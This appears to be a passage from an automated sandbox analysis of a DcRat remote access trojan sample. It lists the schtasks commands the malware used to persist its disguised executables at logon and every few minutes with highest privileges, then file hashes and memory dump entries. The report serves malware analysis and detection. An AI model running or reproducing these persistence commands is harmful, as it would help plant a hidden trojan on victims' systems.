C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\SavesDllcommon\System.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "XClientX" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:560
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "XClient" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "XClientX" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4960
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1580
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004BC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.batFilesize
33B
MD50a9ef172b5e9daeb9c3366842676eac9
SHA118ce47e6f7a7dc2a4c0882a7fa1e69bc91f22cd2
SHA2564193c6cb4fcc0e633a062825fc4b510d826d68063be74cf7f37d5db3a75ea2b6
SHA512dc1985d420f4d7058529acd1afce2bd9e047f95074a3f12ca0923903bb3dab615fb938464d6a75adfd4a890aa3eeda9797c13bfb867bb02e02945af3c108d563
-
C:\SavesDllcommon\fontsaves.exeFilesize
1.2MB
MD573ace1b8b0f1b1c088f11ee29b13ae6b
SHA14b7fa04aacb5a23ab37b9caaee8f852a1bd33bbc
SHA2568be76a2960a823f9284836868172eff28b64de44daba8b09f91ff678bb22d614
SHA5121e13cc8ac20c9e10cd13f78cb54e75b23ad255d1601d45ee78770f3cb74fe5e9bb3e84d8ca8f7c44659365da45a79b72be85d6433a8bbbac79b925839cc7e4d1
-
C:\SavesDllcommon\gdNhr8l.vbeFilesize
216B
MD567750c3e2cc7970484d8e1f3e95c4454
SHA1b4a6e933dfda3db9a2663798f421a2b06a0c5b35
SHA256a5c935975dff3bdbd1fd9c63abc8c47d2e24dd408dd5d0760b8af2db291c9655
SHA512d794c9fdc99334fe3627d03e63e41d67a6f47e5b1601eb3c4c9cd037dd6b74c238e3bd8510c7755fd4e6f366b140bf9b82d6fbe734237ee8d44de51a193c1fa9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD521017c68eaf9461301de459f4f07e888
SHA141ff30fc8446508d4c3407c79e798cf6eaa5bb73
SHA25603b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888
SHA512956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e0391d00f5bfbc34be70790f14d5edf
SHA1fcb04d8599c23967de4f154a101be480933ab0d0
SHA2561c0c0c86d7c736fc9fb148ac7cd6e67565dc5b76fa116ae3b000a79e91855136
SHA512231b9cc6efb928f0748cef04f287d9204c4f7d2eb4bc27f345e9a1afc6d0675057978ca44d1a95334ee2380709aa6dbe74015fedff8f17611a64efcfb9f64d2a
-
C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.batFilesize
193B
MD56427be0302c789764be5d54f7e002a0a
SHA1ac7f0dc923bea68b72d321b4770e5d70eaa8c9e2
SHA256ec42526166d1e5aa74bd6015cb52224f553a437f39c36516a1f1d79340d02b19
SHA5125eefe384774b8b754e9428aed6fdfcf8649c0b5204d67798fa3f0cebd09a143eae2e5e4accdb168db53c370042faeb488b191b2b3a68b52a25e1b8f155fdb620
-
C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exeFilesize
3.8MB
MD5137c1b0243beb35b6a0b6dbe632dc341
SHA1b710da533d9a33f4d7fc78d317bbcee8dc95826d
SHA25686cd8a8dc5228014e559788e7a0f5ed6fef637691bf53111e9eab4187a0652ab
SHA51249ee75b71223ed47ae81a089247ff3002d50f70ede8e57af42f73745bbf7cb8ee7c71c1ab5da9d967fbe0b2f9de5dad70f4a7f4cfe44ba104d5a60be53eccabf
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4uidhoz.dzr.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\uliqxd.exeFilesize
1.5MB
MD55841e08c36ee75ba2d4002507ceb9be8
SHA1c679478e7041b2c3f0659403e87dc1bf011e7f2c
SHA25685905bb938abe1ea461869f73103f364f2dddaae579f35d460338a21db8b8056
SHA5122fdd014e5c128e7bb6112cc3facf50dd413dbb7d9e705d7c3b21dd0a9d4717281d1bdb62bf416ed1e651bea8177db3d3ae0b3ac6ba729e0eb9010e694d8d7744
-
memory/568-177-0x0000000001540000-0x000000000154C000-memory.dmpFilesize
48KB
-
memory/568-51-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/568-1-0x0000000000C50000-0x0000000000C68000-memory.dmpFilesize
96KB
-
memory/568-0-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmpFilesize
8KB
-
memory/568-119-0x0000000002DA0000-0x0000000002DAC000-memory.dmpFilesize
48KB
-
memory/568-115-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/1284-171-0x000001586BCF0000-0x000001586C0B4000-memory.dmpFilesize
3.8MB
-
memory/1284-181-0x000001586E880000-0x000001586E89E000-memory.dmpFilesize
120KB
-
memory/1284-182-0x000001586E8A0000-0x000001586E8AB000-memory.dmpFilesize
44KB
-
memory/1284-180-0x000001586E870000-0x000001586E87D000-memory.dmpFilesize
52KB
-
memory/1284-179-0x000001586DD50000-0x000001586DD59000-memory.dmpFilesize
36KB
-
memory/1284-178-0x000001586E690000-0x000001586E6D6000-memory.dmpFilesize
280KB
-
memory/3428-123-0x000000001C440000-0x000000001C45E000-memory.dmpFilesize
120KB
-
memory/3428-122-0x000000001BF10000-0x000000001BF1D000-memory.dmpFilesize
52KB
-
memory/3428-124-0x000000001BF20000-0x000000001BF2B000-memory.dmpFilesize
44KB
-
memory/3428-121-0x000000001BEE0000-0x000000001BEE9000-memory.dmpFilesize
36KB
-
memory/3428-120-0x000000001BE90000-0x000000001BED6000-memory.dmpFilesize
280KB
-
memory/4000-72-0x00000000007D0000-0x0000000000902000-memory.dmpFilesize
1.2MB
-
memory/4000-75-0x000000001B5C0000-0x000000001B5D6000-memory.dmpFilesize
88KB
-
memory/4000-73-0x000000001B5A0000-0x000000001B5BC000-memory.dmpFilesize
112KB
-
memory/4000-74-0x000000001B610000-0x000000001B660000-memory.dmpFilesize
320KB
-
memory/4000-76-0x0000000002A50000-0x0000000002A5C000-memory.dmpFilesize
48KB
-
memory/4392-18-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/4392-17-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/4392-14-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/4392-12-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/4392-13-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/4392-11-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmpFilesize
10.8MB
-
memory/4392-10-0x000001191A880000-0x000001191A8A2000-memory.dmpFilesize
136KB